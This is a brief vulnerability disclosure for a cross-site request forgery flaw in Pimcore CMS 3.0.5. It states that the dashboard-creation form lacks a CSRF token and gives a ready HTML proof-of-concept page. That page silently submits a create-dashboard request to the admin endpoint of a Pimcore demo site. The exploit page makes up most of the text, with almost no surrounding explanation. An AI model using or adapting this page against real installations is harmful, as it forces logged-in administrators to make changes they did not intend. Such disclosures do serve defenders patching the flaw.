# Affected software: pimcore cms # Type of vulnerability:csrf # URL:pimcore.org # Discovered by: provensec # Website: provensec.com #version: Version: 3.0.5 (Build: 3468) # Proof of concept no csrf token on add dashboard form <html> <body> <form action="http://demo.pimcore.org/admin/portal/create-dashboard"> <input type="hidden" name="&#95;dc" value="1428652489594" /> <input type="hidden" name="key" value="test" /> <input type="submit" value="Submit request" /> </form> </body> </html>